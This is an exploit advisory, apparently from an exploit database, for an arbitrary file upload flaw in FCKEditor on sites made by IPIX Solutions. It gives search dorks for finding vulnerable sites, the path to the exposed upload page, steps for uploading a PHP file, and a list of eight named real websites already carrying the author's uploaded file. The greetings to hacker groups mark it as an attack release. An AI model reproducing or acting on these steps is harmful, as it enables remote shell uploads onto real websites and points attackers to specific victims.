Sites powered by IPIX Solutions suffer from a remote shell upload vulnerability. Note that this advisory has site-specific information.
27e0d879f79b50aa343d74317dffd79db028d0c3a714abde266eedfe5860d629
#Exploit Title : IPIX Solutions (FCKEditor) File Upload Vulnerability
#Author : DevilScreaM
#Date : 14/09/2013
#Category : Web Applications
#Vendor : http://ipixsolutions.com
#Dork
intext:Powered By Ipix Solutions
intext:Powered By:IPIX SOLUTIONS
intext:Website Design @ IPIX Solutions.
#Vulnerability : Arbitrary File Upload Vulnerability
#Tested On : Windows 7/XP , Ubuntu (Mozila & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
POC and Exploit
http://site-target/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
===================================================================================
1. At "Select the "File Uploader" to use" Change From ASP to PHP
2. Select Your File
3. Click Send it to Server, and waiting...
4. Result Upload At
http://site-target/userfiles/[YOUR_FILE.txt]
===================================================================================
Example
http://morisonmenonlimited.com/userfiles/devilscream.txt
http://smdentallab.org/userfiles/devilscream.txt
http://rklatex.com/userfiles/devilscream.txt
http://malabarholidays.com/userfiles/devilscream.txt
http://mimsindia.com/userfiles/devilscream.txt
http://stjosephstly.com/userfiles/devilscream.txt
http://memundahss.com/userfiles/devilscream.txt
http://novadenttly.com/userfiles/devilscream.txt